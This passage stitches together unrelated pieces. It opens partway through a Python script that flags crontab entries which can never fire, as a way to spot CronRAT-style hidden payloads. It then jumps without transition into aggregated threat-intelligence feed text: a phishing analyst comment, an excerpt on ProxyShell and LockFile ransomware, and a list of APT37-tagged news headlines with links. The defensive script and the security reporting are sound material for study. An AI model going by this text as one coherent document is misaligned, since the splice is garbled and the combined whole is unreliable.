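*/5 * 1-31 * * /usr/local/bin/healthcheck
0 1 29 2 * /usr/local/bin/leap-day-job
0 3 31 2 1 /usr/local/bin/monday-job
"""


def parse_field(field: str, lo: int, hi: int) -> set[int]:
    """Expand one crontab field (lists, ranges, steps, '*') into the values it matches."""
    values: set[int] = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_text = part.split("/", 1)
            step = int(step_text)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            a, b = part.split("-", 1)
            start, end = int(a), int(b)
        else:
            start = end = int(part)
        values.update(range(start, end + 1, step))
    return values


def entry_is_dead(dom_field: str, month_field: str, dow_field: str) -> bool:
    """True when no (day-of-month, month) combination the entry names ever occurs.

    Vixie cron runs a job when *either* day-of-month or day-of-week matches if
    both are restricted, so a restricted day-of-week keeps an entry alive even
    with an impossible date; only '*' day-of-week entries can be dead this way.
    Out-of-range values (day 0, day 32, month 13) are reported as dead too,
    since cron would never run them either.
    """
    if dow_field != "*":
        return False
    days = parse_field(dom_field, 1, 31)
    months = parse_field(month_field, 1, 12)
    return not any(1 <= d <= DAYS_IN_MONTH.get(m, 0) for d in days for m in months)


def find_dead_entries(crontab_text: str) -> list[tuple[int, str]]:
    """Return (line number, command) for every entry that can never run."""
    dead = []
    for lineno, raw in enumerate(crontab_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if "=" in fields[0] or len(fields) < 6:
            continue   # VAR=value assignment, @reboot-style shortcut, or malformed line
        _minute, _hour, dom, month, dow, command = fields
        try:
            if entry_is_dead(dom, month, dow):
                dead.append((lineno, command))
        except ValueError:
            dead.append((lineno, command))   # unparseable field: cron rejects it, treat as suspicious
    return dead


if __name__ == "__main__":
    for lineno, command in find_dead_entries(SAMPLE_CRONTAB):
        print(f"line {lineno}: never fires -> {command}")
```

Run it over the output of crontab -l for each user and over /etc/cron.d and /var/spool/cron on the host; a never-firing entry whose command points into /tmp, /var/tmp or a dot-directory deserves the same attention the Sansec report gives CronRAT, because the entry itself may be the payload carrier rather than something cron is meant to execute.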
Analyst Comment: With financial transactions increasing at this time of year, financially themed malspam and phishing emails are likely to be a common tactic. It is therefore crucial that employees are aware of their financial institution's policies regarding electronic communication. If a user is worried by the scare tactics such emails often use, they should contact their financial institution through a known-good channel rather than anything linked from the message. Requests to open a document under a sense of urgency, and poor grammar, are often indicative of malspam or phishing; such emails should be avoided and reported to the appropriate personnel.
Tags: Phishing, XBALTI

Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors (pub […]
2021-12-07T16:04:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-nginx-trojans-blackbyte-ransomware-android-malware-campaigns-and-more
Feed tags: Ransomware, Malware, Tool, Vulnerability, Threat, Cloud | Actors: APT 37

Security Affairs: Bitcoin Miner [oom_reaper] targets QNAP NAS devices
2021-12-07T15:28:27+00:00 https://securityaffairs.co/wordpress/125370/hacking/qnap-bitcoin-miner.html?utm_source=rss&utm_medium=rss&utm_campaign=qnap-bitcoin-miner
Feed tags: Threat, Cloud | Actors: APT 37

SecurityWeek: North Korean Hackers Use New 'Chinotto' Malware to Target Windows, Android Devices
2021-11-30T12:24:19+00:00 https://www.securityweek.com/north-korean-hackers-use-new-chinotto-malware-target-windows-android-devices
Feed tags: Malware, Threat, Cloud | Actors: APT 37

Fortinet ThreatSignal: Recent APT37 Activity and Chinotto, a Multi Platform Infostealer
2021-11-30T11:24:48+00:00 https://www.fortiguard.com/threat-signal-report/4311
Feed tags: Malware, Threat, Patching, Cloud | Actors: APT 37

Threatpost: ScarCruft APT Mounts Desktop/Mobile Double-Pronged Spy Attacks
2021-11-29T19:08:06+00:00 https://threatpost.com/scarcruft-apt-desktop-mobile-attacks/176620/
Actors: APT 37

Kaspersky Securelist: ScarCruft surveilling North Korean defectors and human rights activists
2021-11-29T10:00:31+00:00 https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/
Feed tags: Cloud | Actors: APT 37

Bleeping Computer: APT37 targets journalists with Chinotto multi-platform malware
2021-11-29T08:43:29+00:00 https://www.bleepingcomputer.com/news/security/apt37-targets-journalists-with-chinotto-multi-platform-malware/
Feed tags: Malware, Cloud | Actors: APT 37

The Hacker News:
New Chinotto Spyware Targets North Korean Defectors, Human Rights Activists
2021-11-29T05:14:10+00:00 https://thehackernews.com/2021/11/new-chinotto-spyware-targets-north.html
Feed tags: Threat, Cloud | Actors: APT 37

Security Affairs: North Korea-linked TA406 cyberespionage group activity in 2021
2021-11-19T15:14:40+00:00 https://securityaffairs.co/wordpress/124775/apt/north-korea-linked-ta406-2021.html?utm_source=rss&utm_medium=rss&utm_campaign=north-korea-linked-ta406-2021
Feed tags: Cloud | Actors: APT 37

Cisco Talos: North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets
2021-11-10T14:11:03+00:00 http://feedproxy.google.com/~r/feedburner/Talos/~3/z1BNb2_mgJ8/kimsuky-abuses-blogs-delivers-malware.html
Feed tags: Malware, Cloud | Actors: APT 37

Anomali: Anomali Cyber Watch: ProxyShell Being Exploited to Install Webshells and Ransomware, Neurevt Trojan Targeting Mexican Users, Secret Terrorist Watchlist Exposed, and More
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the "anomali cyber watch" tag.

Trending Cyber News and Threat Intelligence

Microsoft Exchange Servers Still Vulnerable to ProxyShell Exploit (published: August 23, 2021)
Although patches for the ProxyShell vulnerabilities in Microsoft Exchange have been available since Microsoft's spring 2021 Exchange updates (the CVEs themselves were only published in July 2021), researchers found that nearly 2,000 Exchange servers had recently been compromised to host webshells. These webshells give attackers persistent backdoor access to the compromised servers for further exploitation and lateral movement into the affected organizations.
Researchers believe these attacks may be related to the recent LockFile ransomware attacks.
Analyst Comment: Organizations running Microsoft Exchange are strongly encouraged to prioritize these updates to stop ongoing exploitation. Patching does not remove webshells that are already planted, so a thorough investigation to discover and remove them should follow. A threat intelligence platform (TIP) such as Anomali ThreatStream can help organizations ingest current indicators of compromise (IOCs) and determine whether their Exchange instances have been compromised.
MITRE ATT&CK: Exploitation for Client Execution - T1203 | Web Shell - T1100 | Hidden Files and Directories - T1158 | Source - T1153
Tags: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, Exchange, ProxyShell, backdoor

LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers (published: August 20, 2021)
A new ransomware family, named LockFile by Symantec researchers, has been observed on the network of a US financial organization. The first known instance of this ransomware dates to July 20, 2021, and activity is ongoing; it has been seen targeting organizations in a wide range of industries across the US and Asia. The exact initial access vector is not confirmed, but the attackers enter through Microsoft Exchange servers and then abuse the incompletely patched PetitPotam NTLM-relay vulnerability (CVE-2021-36942, a flaw in the Windows MS-EFSRPC service rather than in Exchange itself) to take over Domain Controllers (DCs), which are then used to push the ransomware tooling to devices that connect to the DC.
The attackers appear to remain resident on the network for several […]
2021-08-24T17:11:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-proxyshell-being-exploited-to-install-webshells-and-ransomware-neurevt-trojan-targeting-mexican-users-secret-terrorist-watchlist-exposed-and-more
Feed tags: Ransomware, Malware, Tool, Vulnerability, Threat, Patching, Cloud | Actors: APT 37

Threatpost: InkySquid State Actor Exploiting Known IE Bugs
2021-08-19T20:19:04+00:00 https://threatpost.com/inkysquid-exploiting-ie-bugs/168833/
Actors: APT 37

Security Affairs: NK-linked InkySquid APT leverages IE exploits in recent attacks
2021-08-19T06:47:34+00:00 https://securityaffairs.co/wordpress/121262/apt/inkysquid-apt-ie-exploirs.html?utm_source=rss&utm_medium=rss&utm_campaign=inkysquid-apt-ie-exploirs
Feed tags: Cloud | Actors: APT 37

The Hacker News: NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware
2021-08-18T01:33:33+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/f3Q4pG8_fI8/nk-hackers-deploy-browser-exploit-on.html
Feed tags: Malware, Threat, Cloud | Actors: APT 37

Infosecurity Magazine: UN Links North Korea to $281m Crypto Exchange Heist
2021-02-11T11:00:00+00:00 https://www.infosecurity-magazine.com:443/news/un-links-north-korea-281m-crypto/
Feed tags: Cloud | Actors: APT 37

The Hacker News:
ALERT: North Korean hackers targeting South Korea with RokRat Trojan
2021-01-08T01:54:44+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/yF4TY5O24po/alert-north-korean-hackers-targeting.html
Feed tags: Tool, Cloud | Actors: APT 37

Security Affairs: North Korea-linked APT37 targets South with RokRat Trojan
2021-01-07T18:24:41+00:00 https://securityaffairs.co/wordpress/113134/malware/apt37-rokrat-trojan.html?utm_source=rss&utm_medium=rss&utm_campaign=apt37-rokrat-trojan
Feed tags: Threat | Actors: APT 37

Malwarebytes Labs: Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat
A North Korean threat group has swapped the usual Hangul Office lures for a cleverly packed Office macro. Categories: Social engineering, Threat analysis
2021-01-06T15:14:45+00:00 https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/
Feed tags: Threat, Cloud | Actors: APT 37

Bleeping Computer: North Korean software supply chain attack targets stock investors
2021-01-05T11:55:57+00:00 https://www.bleepingcomputer.com/news/security/north-korean-software-supply-chain-attack-targets-stock-investors/
Feed tags: Cloud | Actors: APT 37